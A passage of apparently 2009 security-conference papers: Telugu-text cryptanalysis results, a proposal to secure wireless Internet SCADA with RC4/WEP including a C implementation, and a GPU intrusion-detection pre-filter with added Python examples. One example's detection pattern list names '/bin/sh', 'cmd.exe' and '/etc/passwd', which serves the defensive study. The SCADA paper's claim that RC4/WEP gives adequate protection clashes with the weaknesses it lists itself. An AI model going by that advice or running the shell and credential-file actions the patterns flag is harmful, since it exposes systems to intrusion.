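REFERENCE_EN = "a constructed reference text that stands in for english letter frequencies"
PLAIN_TE = "తెలుగు భాష తెలుగు లిపి"
REFERENCE_TE = "తెలుగు లిపి"

if __name__ == "__main__":
    for name, plain, ref in (("English", PLAIN_EN, REFERENCE_EN),
                             ("Telugu", PLAIN_TE, REFERENCE_TE)):
        for bits in (8, 16):
            print(f"{name}, {bits}-bit key: {experiment(plain, ref, bits):.1f}% retrieved")
```

When the reference distribution is the plaintext's own, the rank mapping is exact and retrieval is 100%; the figures in Tables 1 and 2 are lower precisely because a language-level frequency table only approximates the sample, and more so for a script whose code point set is only partly present in each sample.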
6 Conclusions
The complex orthographic nature of Indic scripts is explored while studying the impact of the frequency distribution of Telugu character code points on the cryptanalysis of text retrieval. An extensive analysis is carried out on a large set of Telugu character code points compiled from present usage of the script. Randomly generated 8-bit and 16-bit keys are applied to a simple encryption model for the present study. A comparison between the language complexities of English and Telugu is carried out from the standpoint of the frequency distribution of character code points under cryptanalysis. Plain text of different sizes, varying from 2,000 to 75,000 characters, is used for this purpose. Reverse mapping of plain text from the encrypted text is observed to be a maximum of 51% and 21% for English and Telugu respectively. However, the minimum levels of reverse mapping in the same approach are observed to be 27% and 1% respectively. From the observed results it is easy to infer that reverse mapping is more complex in the case of Indic scripts (with specific reference to Telugu), even with smaller key sizes. The extended observations with regard to the increase in key size reflect the fact that reverse mapping becomes much more complex. Exploration of n-gram characteristics and further evaluation of the complexities of Indic scripts is in progress.
Acknowledgments
This work was supported in part by the Information Technology & Communication Department, Government of Andhra Pradesh, under grant G.O. M.S. No. 5.
Symmetric-Key Encryption for Wireless Internet SCADA
Rosslin John Robles and Min-Kyu Choi
Multimedia Engineering Department, Hannam University, Daejeon, Korea
[email protected], [email protected]
Abstract. Traditionally SCADA is connected only to a limited private network. With new technology and facilities, there are also demands for connecting SCADA through the internet. The internet SCADA facility has brought a lot of advantages in terms of control, data viewing and report generation. Aside from connecting SCADA to the internet, there are also operators who want to connect their system wirelessly, which can save budget for communication lines. Along with the advantages it brings come security issues regarding wireless internet SCADA. In this paper, we discuss internet SCADA, its connection through wireless communication and the security issues surrounding it. To address the security issues, a symmetric-key encryption for wireless internet SCADA is proposed.
Keywords: SCADA, Security Issues, Internet, Wireless.
1 Introduction
SCADA, like other control systems, is important because it controls most of our commodities. Traditional SCADA communications have been point-to-multipoint serial communications over leased lines or private radio systems. With the advent of the Internet Protocol (IP), IP technology has seen increasing use in SCADA communications. The connectivity of the Internet can give SCADA more scale, which enables it to provide access to real-time data display, alarming, trending, and reporting from remote equipment. Wireless communication is the transfer of information over a distance without the use of electrical conductors or wires. [1] Wireless technology can also be applied to SCADA, especially when it is connected through the internet, and it can save a lot of budget for communication lines. In the next parts of this paper, SCADA is discussed: the conventional setup, Internet SCADA and wireless SCADA. Advantages which can be attained using wireless technology for Internet SCADA are also covered, and security issues are pointed out. We propose a symmetric-key encryption for wireless Internet SCADA security.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 289–297, 2009. © Springer-Verlag Berlin Heidelberg 2009

2 SCADA Defined
SCADA is an acronym that stands for Supervisory Control and Data Acquisition. SCADA refers to a system that collects data from various sensors at a factory, plant or other remote locations and then sends this data to a central computer, which then manages and controls the data. SCADA is a term that is used broadly to describe control and management solutions in a wide range of industries. Some of the industries where SCADA is used are water management systems, electric power, traffic signals, mass transit systems, environmental control systems, and manufacturing systems.
One of the key processes of SCADA is the ability to monitor an entire system in real time. This is facilitated by data acquisition, including meter reading, checking statuses of sensors, etc., communicated at regular intervals depending on the system. Besides the data being used by the RTU, it is also displayed to a human who is able to interface with the system to override settings or make changes when necessary.
SCADA can be seen as a system with many data elements called points. Usually each point is a monitor or sensor. Points can be either hard or soft. A hard data point can be an actual monitor; a soft point can be seen as an application or software calculation. Data elements from hard and soft points are usually recorded and logged to create a time stamp or history.
There are many parts of a working SCADA system. A SCADA system usually includes signal hardware (input and output), controllers, networks, user interface (HMI), communications equipment and software. All together, the term SCADA refers to the entire central system. The central system usually monitors data from various sensors that are either in close proximity or off site. Typically SCADA systems include the following components: [2]
1. Instruments in the field or in a facility that sense conditions such as pH, temperature, pressure, power level and flow rate.
2. Operating equipment such as pumps, valves, conveyors and substation breakers that can be controlled by energizing actuators or relays.
3. Local processors that communicate with the site's instruments and operating equipment. This includes the Programmable Logic Controller (PLC), Remote Terminal Unit (RTU), Intelligent Electronic Device (IED) and Process Automation Controller (PAC). A single local processor may be responsible for dozens of inputs from instruments and outputs to operating equipment.
4. Short range communications between the local processors and the instruments and operating equipment. These relatively short cables or wireless connections carry analog and discrete signals using electrical characteristics such as voltage and current, or using other established industrial communications protocols.
5. Host computers that act as the central point of monitoring and control. The host computer is where a human operator can supervise the process, receive alarms, review data and exercise control.
6. Long range communications between the local processors and host computers. This communication typically covers miles using methods such as leased phone lines, satellite, microwave, frame relay and cellular packet data.
2.1 SCADA Hardware and Software
SCADA systems are an extremely advantageous way to run and monitor processes. They are great for small applications such as climate control or can be effectively
used in large applications such as monitoring and controlling a nuclear power plant or mass transit system. [3] SCADA can come with open and non-proprietary protocols. Smaller systems are extremely affordable and can either be purchased as a complete system or be mixed and matched from specific components. Large systems can also be created with off-the-shelf components. SCADA system software can also be easily configured for almost any application, removing the need for custom-made or intensive software development.
2.2 HMI
A SCADA system includes a user interface, usually called the Human Machine Interface (HMI). The HMI of a SCADA system is where data is processed and presented to be viewed and monitored by a human operator. This interface usually includes controls through which the individual can interface with the SCADA system. [3] HMIs are an easy way to standardize the monitoring of multiple RTUs or PLCs (programmable logic controllers). Usually RTUs or PLCs will run a pre-programmed process, but monitoring each of them individually can be difficult, usually because they are spread out over the system. Because RTUs and PLCs historically had no standardized method to display or present data to an operator, the SCADA system communicates with the PLCs throughout the system network and processes the information so that it is easily disseminated by the HMI. HMIs can also be linked to a database, which can use data gathered from PLCs or RTUs to provide graphs on trends, logistic info, schematics for a specific sensor or machine, or even make troubleshooting guides accessible. In the last decade, practically all SCADA systems include an integrated HMI and PLC device, making it extremely easy to run and monitor a SCADA system.
3 Installation of SCADA
SCADA is traditionally set up in a private network not connected to the internet. This is done for the purpose of isolating the confidential information as well as the control of the system itself. Due to distance, the processing of reports and emerging technologies, SCADA can now be connected to the internet. This brings a lot of advantages and disadvantages, which will be discussed in the later part of this paper.
3.1 Conventional SCADA
The function of SCADA is collecting the information, transferring it back to the central site, carrying out any necessary analysis and control, and then displaying that information on a number of operator screens. Systems automatically control the actions and control the process of automation. Conventionally, relay logic was used to control production and plant systems. With the discovery of the CPU and other electronic devices, manufacturers incorporated digital electronics into relay logic equipment. Programmable logic controllers or
Fig. 1. Common SCADA Installation utilizing PLC/DCS, Sensors and Master Station connected using a fieldbus
PLCs are still the most widely used control systems in industry. As the need to monitor and control more devices in the plant grew, the PLCs were distributed and the systems became more intelligent and smaller in size. PLCs (programmable logic controllers) and DCS (distributed control systems) are used as shown in Figure 1.
4 Wireless SCADA
Wireless SCADA is required in those applications where wireline communications to the remote site are prohibitively expensive or too time-consuming to construct. In particular types of industry, like Oil & Gas or Water & Wastewater, wireless SCADA is often the only solution due to the remoteness of the sites. [4] The typical wireless SCADA architecture is point-multipoint, with one master polling multiple remote RTUs (Remote Terminal Units) or PLCs using RTU or PLC data communication protocols such as Modbus, AB-DF1, and DNP3.0. Each PLC or RTU at the remote site is programmed with a unique system address, and those addresses are all configured into the SCADA host MMI. The SCADA host then polls these addresses and stores the acquired data in its database. It performs centralized alarm management, data trending, operator display and control.
Fig. 2. Wireless SCADA
Modern SCADA host MMIs like NetSCADA can easily accommodate many different types of industrial protocols, and the architecture allows multiple clients to view the same data and seamless expansion to handle additional remote sites and I/O points. Wireless SCADA systems can range from simple point-multipoint systems like the 900-MB spread spectrum system shown in Figure 2 using the Modbus protocol:
5 Internet SCADA
Conventional SCADA has only four components: the master station, PLC/RTU, fieldbus and sensors. Internet SCADA replaces or extends the fieldbus to the internet. This means that the master station can be on a different network or location. In Figure 3, you can see the architecture of SCADA connected through the internet. Like a normal SCADA, it has RTUs/PLCs/IEDs that can be connected wirelessly. Another element is the SCADA service provider or the master station; this also includes user access to the SCADA website. This is for the smaller SCADA operators that can avail themselves of the services provided by the SCADA service provider, or it can be a company that uses SCADA exclusively. Another component of the internet SCADA is the customer application, which allows report generation or billing. Along with the fieldbus, the internet is an extension. This is set up like a private network so that only the master station can have access to the remote assets. The master also has an extension that acts as a web server so that the SCADA users and customers can access the data through the website of the SCADA provider. One may wonder why we need to connect SCADA to the Internet even though there are a lot of issues surrounding it. The answer is because of the many advantages it presents, such as the following. [6]
Wide area connectivity and pervasive
Routable
Parallel Polling
Redundancy and Hot Standby
Large addressing range
Integration of IT to Automation and Monitoring Networks
Standardization
Fig. 3. Internet SCADA Architecture [5]
5.1 Internet SCADA Issues
Even before connecting SCADA to the Internet, it was already surrounded by many security issues, and now the Internet has made it more vulnerable to attacks. Consequently, the security of SCADA-based systems has come into question as they are increasingly seen as extremely vulnerable to cyberwarfare/cyberterrorism attacks. [7][8] Here are the common security issues in SCADA:
The lack of concern about security and authentication in the design, deployment and operation of existing SCADA networks.
The belief that SCADA systems have the benefit of security through obscurity through the use of specialized protocols and proprietary interfaces.
The belief that SCADA networks are secure because they are purportedly physically secured.
The belief that SCADA networks are secure because they are supposedly disconnected from the Internet.
IP performance overhead of SCADA connected to the Internet.
6 Utilization of Symmetric Key Encryption
Symmetric-key algorithms are a class of algorithms for cryptography that use trivially related, often identical, cryptographic keys for both decryption and encryption. The encryption key is trivially related to the decryption key, in that they may be identical or there is a simple transform to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. [9] Symmetric-key algorithms can be divided into stream ciphers and block ciphers. Stream ciphers encrypt the bytes of the message one at a time, and block ciphers take a number of bytes and encrypt them as a single unit. Blocks of 64 bits have been commonly used; the Advanced Encryption Standard algorithm approved by NIST in December 2001 uses 128-bit blocks. [9]
6.1 RC4 Cipher
RC4 is a stream cipher designed by Rivest for RSA Data Security (now RSA Security). It is a variable key-size stream cipher with byte-oriented operations. [10] It is the most widely used software stream cipher and is used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks). [11] While remarkable for its simplicity and speed in software, RC4 has weaknesses that argue against its use in new systems. [12] It is especially vulnerable when the beginning of the output keystream is not discarded, when nonrandom or related keys are used, or when a single keystream is used twice; some ways of using RC4 can lead to very insecure cryptosystems such as WEP. The algorithm is based on the use of a random permutation. Analysis shows that the period of the cipher is overwhelmingly likely to be greater than 10^100. Eight to sixteen machine operations are required per output byte, and the cipher can be
expected to run very quickly in software. Independent analysts have scrutinized the algorithm and it is considered secure. [11] Many stream ciphers are based on linear feedback shift registers (LFSRs), which, while efficient in hardware, are less so in software. The design of RC4 avoids the use of LFSRs and is ideal for software implementation, as it requires only byte manipulations. It uses 256 bytes of memory for the state array, S[0] through S[255], k bytes of memory for the key, key[0] through key[k-1], and integer variables i, j, and k. A modulus 256 can be computed with a bitwise AND with 255. Here is a simple implementation in C:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

unsigned char S[256];   /* RC4 state array (the permutation) */
unsigned int i, j;      /* PRGA indices, kept global as in the original listing */

/* KSA: key-scheduling algorithm, initialises S from the key */
void rc4_init(unsigned char *key, unsigned int key_length)
{
    for (i = 0; i < 256; i++)
        S[i] = i;
    for (i = j = 0; i < 256; i++) {
        unsigned char temp;
        j = (j + key[i % key_length] + S[i]) & 255;   /* & 255 is mod 256 */
        temp = S[i];
        S[i] = S[j];
        S[j] = temp;
    }
    i = j = 0;
}

/* PRGA: pseudo-random generation algorithm, returns one keystream byte */
unsigned char rc4_output(void)
{
    unsigned char temp;
    i = (i + 1) & 255;
    j = (j + S[i]) & 255;
    temp = S[j];
    S[j] = S[i];
    S[i] = temp;
    return S[(temp + S[j]) & 255];
}

int main(void)
{
    /* each row holds a key and a plaintext; the ciphertext is printed in hex */
    unsigned char test_vectors[3][2][32] = {
        {"Key", "Plaintext"},
        {"Master", "station"},
        {"control", "remote RTU"}
    };
    int x;
    for (x = 0; x < 3; x++) {
        size_t y;
        rc4_init(test_vectors[x][0], strlen((char *)test_vectors[x][0]));
        for (y = 0; y < strlen((char *)test_vectors[x][1]); y++)
            printf("%02X", test_vectors[x][1][y] ^ rc4_output());
        printf("\n");
    }
    return 0;
}
7 Symmetric Key Encryption in Wireless SCADA Environment
WEP was included as the privacy component of the original IEEE 802.11 standard. WEP uses the stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity. It can be applied to wireless SCADA as it is applied to other wireless systems. Messages between remote RTUs can be converted to ciphertext by utilizing this mechanism. Figure 4 shows how this is done.
Fig. 4. Standard WEP Encryption in Wireless SCADA environment
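The RC4 keystream behaviour behind Sections 6.1 and 7, as an added example that is not the paper's code: a Python RC4 with the same KSA/PRGA as the C listing, checked against the listing's first test vector, used to show concretely why a WEP-style deployment between RTUs must never protect two messages with one keystream and how the weak initial output can be dropped. The shared key, IVs and RTU messages are constructed values; the IV || shared-key construction is WEP's, not something the paper spells out.

```python
"""Added example, not the paper's or the standard's code: RC4 keystream reuse
and RC4-drop, with constructed SCADA-style messages."""


def rc4_keystream(key: bytes, length: int, drop: int = 0) -> bytes:
    """Return `length` keystream bytes; `drop` discards the first bytes
    (RC4-drop[n]), the usual mitigation for the weak initial output of Sect. 6.1."""
    S = list(range(256))
    j = 0
    for i in range(256):                        # KSA, as in the C listing
        j = (j + S[i] + key[i % len(key)]) & 255
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for n in range(drop + length):              # PRGA
        i = (i + 1) & 255
        j = (j + S[i]) & 255
        S[i], S[j] = S[j], S[i]
        if n >= drop:
            out.append(S[(S[i] + S[j]) & 255])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes, drop: int = 0) -> bytes:
    """Encrypt or decrypt: XOR with the keystream is its own inverse."""
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(key, len(data), drop)))


def wep_packet_key(iv: bytes, shared_key: bytes) -> bytes:
    """WEP forms the per-packet RC4 key as IV || shared key and sends the IV in
    clear. The IV is only 24 bits, so on a busy link IVs repeat and two packets
    end up under the same keystream (constructed shared key below)."""
    return iv + shared_key


def keystream_reuse_leaks(key: bytes, msg1: bytes, msg2: bytes) -> bool:
    """What a passive observer of the wireless link learns when one keystream
    protects two messages: c1 XOR c2 == m1 XOR m2, so the key hides nothing
    about how the two messages relate (a known-format message such as a
    status report then reveals the other one)."""
    c1, c2 = rc4_crypt(key, msg1), rc4_crypt(key, msg2)
    n = min(len(c1), len(c2))
    observed = bytes(a ^ b for a, b in zip(c1[:n], c2[:n]))
    return observed == bytes(a ^ b for a, b in zip(msg1[:n], msg2[:n]))


# Constructed SCADA-style messages and key (hypothetical values).
SHARED_KEY = b"master-rtu-key"
MSG_1 = b"RTU07 PUMP1 ON  PRESSURE 31.5"
MSG_2 = b"RTU07 PUMP1 OFF PRESSURE 30.9"

if __name__ == "__main__":
    # first test vector of the C listing in Sect. 6.1
    print(rc4_crypt(b"Key", b"Plaintext").hex().upper())   # BBF316E8D940AF0AD3
    same_key = wep_packet_key(b"\x00\x00\x01", SHARED_KEY)
    print("same IV twice leaks m1 xor m2:", keystream_reuse_leaks(same_key, MSG_1, MSG_2))
    # distinct IV per message and RC4-drop of the first 768 bytes
    c1 = rc4_crypt(wep_packet_key(b"\x00\x00\x01", SHARED_KEY), MSG_1, drop=768)
    c2 = rc4_crypt(wep_packet_key(b"\x00\x00\x02", SHARED_KEY), MSG_2, drop=768)
    print("distinct IVs:", c1.hex(), c2.hex())
```

Detection of the reuse condition on a SCADA link is cheap: count IVs per shared key and alarm on a repeat, well before the 2^24 space wraps.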
8 Conclusion
Wireless Internet-based SCADA systems can provide access to real-time data display, alarming, trending, and reporting from remote equipment. However, they also present some vulnerabilities and security issues. In this paper, we discuss how to set up SCADA through a wireless medium to the internet. We also discuss the advantages it brings and some of the security issues surrounding it. The use of symmetric key encryption, specifically the RC4 cipher, was also proposed. It can provide security for the data transmitted between the SCADA master and the remote assets, and also for communication between remote RTUs. Once a system is connected to the internet, it is not impossible for other internet users to gain access to the system, which is why encryption should be implemented. Data and report generation are also in demand, so the internet SCADA is designed to have a web-based report generation system through HTTP. To cut the budget, we suggest in this paper setting it up in a wireless environment.
Acknowledgments. This work was supported by the Security Engineering Research Center, granted by the Korea Ministry of Knowledge Economy.
References
1. Wikipedia, Wireless, http://en.wikipedia.org/wiki/Wireless
2. Hildick-Smith, A.: Security for Critical Infrastructure SCADA Systems. techFAQ "What is SCADA?" (2005), http://www.tech-faq.com/scada.shtml (accessed: May 2008)
3. BENTEK SYSTEMS, Wireless SCADA, http://www.scadalink.com/support/wireless_scada.html (accessed: May 2008)
4. Wallace, D.: Control Engineering. How to put SCADA on the Internet (2003), http://www.controleng.com/article/CA321065.html (accessed: January 2009)
5. Internet and Web-based SCADA, http://www.scadalink.com/technotesIP.htm (accessed: January 2009)
6. Maynor, D., Graham, R.: SCADA Security and Terrorism: We're Not Crying Wolf, http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf (accessed: January 2009)
7. Lemos, R.: SCADA system makers pushed toward security (2006-07-26), http://www.securityfocus.com/news/11402 (accessed: January 2009)
8. Wikipedia, Symmetric-key algorithm, http://en.wikipedia.org/wiki/Symmetric_cipher (accessed: June 2009)
9. RSA Laboratories, "What is RC4?", http://www.rsa.com/rsalabs/node.asp?id=2250 (accessed: June 2009)
10. Wikipedia, "RC4", http://en.wikipedia.org/wiki/RC4
11. "RC4", http://www.wisdom.weizmann.ac.il/~itsik/RC4/rc4.html (accessed: June 2009)
An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection Based on Many-Core GPU
Chengkun Wu, Jianping Yin, Zhiping Cai, En Zhu, and Jieren Cheng
School of Computer Science, National University of Defense Technology, 410073, Changsha, Hunan Province, China
{chengkun_wu,jpyin,zpcai,enzhu,jrcheng}@nudt.edu.cn
Abstract. Multi-pattern search is a time-consuming task in Network Intrusion Detection Systems (NIDS). The processing ability of NIDS cannot catch up with the rapid development of network bandwidth. One intuitive idea is to use pre-filtering to reduce the workload of NIDS. Our goal is to design a novel method for pre-filtering which will be ready for an efficient implementation on many-core GPU. Through statistical analysis, we propose a rudimentary method that uses 2B ASCII sub patterns as the filter keywords. To reduce the size of the filter keyword set, we use Binary Integer Linear Programming (BILP) for optimization. The number of filter keywords is reduced from 4824 to 362, which is also much smaller than with the prefix-based and suffix-based methods. We argue that our method can well utilize the computation power of GPU. Experiments demonstrate that our pre-filter can achieve a good filter ratio, thus alleviating the burden of NIDS.
Keywords: NIDS, pre-filtering, keyword set construction, BILP, GPU.
1 Introduction
Network Intrusion Detection Systems (NIDS) can scan the payload of captured packets for malicious behaviors. The payload scan, however, is a computationally intensive task. Taking Snort as an example [1], payload scanning can consume up to 70% of the execution time [2]. Currently, the processing ability of NIDS cannot catch up with the rapid development of network bandwidth, which makes the NIDS overloaded and thus increases the risk of false negatives. Many researchers have focused on faster multi-pattern matching techniques, such as efficient multi-pattern matching algorithms [3,4,5] and hardware-specialized implementations [6, 7, 8, 9]. Those methods have improved the throughput of NIDSs a lot; however, there are still some defects. Software-based methods are not fast enough, and hardware-based techniques are too expensive and weak in adaptability and scalability. One notable thing is that not all packets are malicious. As a matter of fact, in
This work is supported by the National Natural Science Foundation of China (NO.60603015, NO.60603062), Science Foundation of Hunan Province(06JJ3035).
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 298–305, 2009. © Springer-Verlag Berlin Heidelberg 2009
An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection
299
most cases the network traffic is mainly composed of non-malicious packets. If we can find efficient ways to filter out those normal packets expeditiously before carrying out the time-consuming pattern matching operations, the workload of NIDS will be dramatically reduced. There are also some hardware-based methods, but for the same reasons as mentioned above, we need to find more promising ways. Emerging SIMD GPUs like the NVIDIA G80 [10] are competitive candidates for pre-filter implementation. Most recently, some researchers have done work on pattern matching for network security using GPU [11, 12, 13]. A typical SIMD GPU has several Multi-Processors (MP) and each MP is composed of multiple Stream Processors (SP). Each SP can execute several threads at the same time, thus a GPU can support thousands of threads, which provides great computation power for computationally intensive tasks [10]. Moreover, it can work asynchronously with the CPU, which helps reduce the overhead introduced by pre-filtering. In this paper, we first propose an intuitive method for the construction of the keyword set for pre-filtering, then we introduce Binary Integer Linear Programming (BILP) to optimize the construction, which helps improve the efficiency of pre-filtering. Using our method, the resulting keyword set will be ready for an efficient pre-filtering implementation on GPU. We also explain why our method can well utilize the computation power of GPU.
2 Use Sub-patterns for Packet Pre-filtering
The basic idea of packet pre-filtering comes from the following fact: not every packet contains attack patterns designated by the NIDS's rules. As a result, we can divide the processing into two phases: firstly, use the pre-filter to filter out normal traffic that does not contain attack patterns; secondly, perform a full pattern matching on the remaining packets against the pattern set. This two-phase processing can greatly reduce the time required for the full pattern matching.
2.1 Statistical Analysis
We did a statistical analysis of the appearance probability of all possible 2 consecutive ASCII bytes (a char string with a length of two) on MIT's 1999 normal traffic trace. We went through each packet of the trace file; a 2B string's appearance probability equals the number of different packets in which it occurs divided by the total number of packets in the trace. The results are shown in Table 1. The 1st and 2nd columns give the probability of the most often seen 2B strings in the trace, the 3rd and 4th columns give the probability of the least often seen 2B strings in the trace, and the average probability over all 65536 possible 2B strings (256 × 256) is listed together. We can get several hints from the above table: (1) Different strings differ a lot in their appearance probability; (2) The average appearance probability is low;
Table 1. 2B char string's appearing probability

2B String   Probability   2B String   Probability
(32, 32)    0.03729       (89, 239)   2.936E-06
(0, 0)      0.01249       (239, 141)  2.904E-06
(13, 10)    0.00658       (84, 223)   2.895E-06
(32, 124)   0.00445       (239, 67)   2.873E-06
(61, 34)    0.00425       (179, 239)  2.724E-06
Average     1.526E-05
(3) The most frequent 2B strings are trivial ones: (32,32) is two consecutive space characters, (0,0) is two consecutive string terminators. We can also infer that n-byte strings (n ≥ 3) will have an even lower appearance probability. But as we can see from the table, the average appearance probability of 2B strings is already low enough (1.526E-05) to achieve good results. Moreover, a longer filter keyword will increase the processing complexity and time, so we only discuss 2B filter keywords in this paper.
2.2 Sub-patterns
In this paper, we use the pattern set of the de facto NIDS Snort [1]. We construct our pre-filter based on the above idea and the characteristics of the Snort pattern distribution. We choose a number of sub-patterns as the filter keywords. Packets go through the filter: if we find no match of any sub pattern in the incoming packet content, the packet can be passed; otherwise, the packet is handed to the full pattern matching engine for a further check. The framework is depicted in Fig. 1. To achieve a good filtering result, the filter keywords (the sub patterns) should have a low appearance probability. However, a longer pattern length will increase

[Fig. 1 diagram: Packets → Pre-filter (Sub Pat #1, Sub Pat #2, ..., Sub Pat #n); Match Found → Full Pattern Match Engine; No Match → Pass]
Fig. 1. Simplified framework for NIDS with a pre-filter
the complexity and processing time. In this paper, we set the sub pattern length to 2 bytes. Common ways to find such filter sub patterns include using the prefix, using the suffix, and using all substrings. Prefix- and suffix-based methods are the most popular ones, but our work shows that the substring-based method achieves better results. The rudimentary keyword set can be constructed by selecting one sub pattern of each pattern. As a result, the size of the keyword set is equal to the size of the pattern set. Currently, there are thousands of Snort patterns. This is too large, so we need to optimize our construction.
3 Use BILP to Optimize the Choice of Filter Sub Patterns
As mentioned above, a smaller keyword set leads to more efficient pre-filtering. In this section, we discuss how to reduce the size of the set by using Binary Integer Linear Programming (BILP).
3.1 Basic Idea
Different patterns may share common sub-patterns; this is the key to our optimization. Given two patterns p1 and p2 that have the same sub-pattern s, we say s can represent both p1 and p2 in the pre-filtering phase: if we choose s as the filter keyword, the size of the keyword set K decreases by 1. Many patterns in the Snort pattern set share sub-patterns, so choosing commonly shared sub-patterns is a good way to reduce the size of K. In order not to weaken the pre-filtering, however, the chosen sub-patterns should still have a relatively low appearance probability. The problem therefore becomes a selection problem: select sub-patterns from the rudimentary keyword set so as to reduce both the size of K and the appearance probability of the keywords as much as possible.

3.2 BILP Based Optimization
We can formalize the problem as follows. Given a pattern set $P = \{p_1, p_2, \ldots, p_n\}$, a rudimentary keyword set $K = \{k_1, k_2, \ldots, k_m\}$, the appearance probabilities of all keywords $Prob = \{pr_1, pr_2, \ldots, pr_m\}$, and a relation matrix $R = \{r_{(i,j)}\}$ with $r_{(i,j)} = 1$ if $k_i$ is a sub-pattern of $p_j$ and $r_{(i,j)} = 0$ otherwise, we need to find a choosing vector $Choose = \{c_1, c_2, \ldots, c_m\}$ which satisfies:

(1) $\forall c_i$: $c_i \in \{0, 1\}$, where $1$ means $k_i$ is chosen for the new set and $0$ means it is not;

(2) $\forall p_j$, $1 \le j \le n$: $\exists\, i$, $1 \le i \le m$, such that $r_{(i,j)} = 1$ and $c_i = 1$, i.e. every pattern contains at least one chosen keyword;

(3) $\sum_{i=1}^{m} c_i \cdot pr_i$ is as small as possible.
302
C. Wu et al.
The above problem can be stated as a Binary Integer Linear Programming problem (BILP):

$$\min \sum_{i=1}^{m} c_i \cdot pr_i$$

subject to: $c_i$ binary for all $1 \le i \le m$; and for every pattern $p_j$ there exists an $i$ with $r_{(i,j)} = 1$ and $c_i = 1$, which as a linear constraint reads $\sum_{i=1}^{m} r_{(i,j)}\, c_i \ge 1$ for $1 \le j \le n$.
There are two kinds of input data for the model: the appearance probability of every sub-pattern, and the relation matrix indicating whether a sub-pattern belongs to a pattern or not. Whenever the pattern set changes, we only need to change the input and re-run the optimization.
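The following is an added example, not code from the paper: it builds the 2-byte prefix, suffix and sub-string candidate sets of Sect. 2, estimates the appearance probability of each candidate from an attack-free payload, builds the relation matrix $R$, and solves the BILP of Sect. 3 exactly with a small branch-and-bound (the paper used LINGO 11). The pattern set, the background payload, and the optional `size_penalty` (a tie-breaker that also favours smaller keyword sets; the paper's objective (3) is recovered with penalty 0) are assumptions made here.

```python
"""Added example (not the paper's code): 2-byte sub-pattern extraction (Sect. 2)
and an exact solver for the keyword-selection BILP (Sect. 3).
Assumptions: the pattern set, the attack-free background payload and the
branch-and-bound solver below are constructed here; the paper used the Snort
rule set and LINGO 11."""
from typing import Dict, Iterable, List, Sequence, Set, Tuple


def sub_patterns(pattern: bytes, n: int = 2, how: str = "all") -> Set[bytes]:
    """Length-n candidates of one pattern: its prefix, its suffix, or all substrings."""
    if len(pattern) < n:
        raise ValueError("pattern shorter than the sub-pattern length")
    if how == "prefix":
        return {pattern[:n]}
    if how == "suffix":
        return {pattern[-n:]}
    if how == "all":
        return {pattern[i:i + n] for i in range(len(pattern) - n + 1)}
    raise ValueError(f"unknown method {how!r}")


def candidate_keywords(patterns: Sequence[bytes], how: str = "all", n: int = 2) -> List[bytes]:
    """Rudimentary keyword set K: the union of the candidates of every pattern."""
    return sorted(set().union(*(sub_patterns(p, n, how) for p in patterns)))


def appearance_probability(keywords: Iterable[bytes], background: bytes, n: int = 2) -> Dict[bytes, float]:
    """pr_i: fraction of n-gram positions of attack-free traffic at which keyword k_i occurs."""
    positions = len(background) - n + 1
    if positions <= 0:
        raise ValueError("background shorter than the sub-pattern length")
    counts = {k: 0 for k in keywords}
    for i in range(positions):
        gram = background[i:i + n]
        if gram in counts:
            counts[gram] += 1
    return {k: c / positions for k, c in counts.items()}


def relation_matrix(patterns: Sequence[bytes], keywords: Iterable[bytes]) -> Dict[bytes, Set[int]]:
    """R as a sparse map: keyword k_i -> {j : r(i,j) = 1, i.e. k_i is a substring of p_j}."""
    return {k: {j for j, p in enumerate(patterns) if k in p} for k in keywords}


def min_cost_cover(patterns: Sequence[bytes], keywords: Iterable[bytes],
                   prob: Dict[bytes, float], covers: Dict[bytes, Set[int]],
                   size_penalty: float = 0.0) -> Tuple[float, List[bytes]]:
    """Exact BILP: minimise sum_i c_i*(pr_i + size_penalty) s.t. every p_j contains a chosen k_i.
    Depth-first branch and bound, cheapest keywords tried first; fine for small m."""
    order = sorted(keywords, key=lambda k: (prob[k], k))
    m = len(order)
    all_pats = frozenset(range(len(patterns)))
    # coverable[idx] = patterns that the keywords order[idx:] can still cover (feasibility bound)
    coverable: List[Set[int]] = [set() for _ in range(m + 1)]
    for idx in range(m - 1, -1, -1):
        coverable[idx] = coverable[idx + 1] | covers[order[idx]]
    best: Tuple[float, List[bytes]] = (float("inf"), [])

    def rec(idx: int, chosen: List[bytes], covered: frozenset, cost: float) -> None:
        nonlocal best
        if cost >= best[0]:
            return                      # cannot beat the incumbent
        if covered == all_pats:
            best = (cost, list(chosen))  # every pattern has a chosen keyword
            return
        if not (all_pats - covered) <= coverable[idx]:
            return                      # no feasible completion on this branch
        k = order[idx]
        if covers[k] - covered:         # branch 1: choose k (only useful if it adds coverage)
            chosen.append(k)
            rec(idx + 1, chosen, covered | covers[k], cost + prob[k] + size_penalty)
            chosen.pop()
        rec(idx + 1, chosen, covered, cost)  # branch 2: skip k

    rec(0, [], frozenset(), 0.0)
    return best


# Constructed data (not Snort rules or DARPA traffic): content patterns and an attack-free payload.
PATTERNS = [b"/cgi-bin/", b"/bin/sh", b"cmd.exe", b"/etc/passwd", b"passwd=", b"shell.exe"]
BACKGROUND = (b"GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n"
              b"User-Agent: Mozilla/5.0\r\nAccept: text/html\r\n\r\n"
              b"<html><body><p>Hello, world</p></body></html>")


def select_keywords(patterns: Sequence[bytes] = PATTERNS, background: bytes = BACKGROUND,
                    size_penalty: float = 1e-3) -> Tuple[float, List[bytes]]:
    """Whole pipeline: all 2-byte sub-strings -> probabilities -> R -> optimised keyword set."""
    keywords = candidate_keywords(patterns, "all")
    prob = appearance_probability(keywords, background)
    covers = relation_matrix(patterns, keywords)
    return min_cost_cover(patterns, keywords, prob, covers, size_penalty)


if __name__ == "__main__":
    for how in ("prefix", "suffix", "all"):
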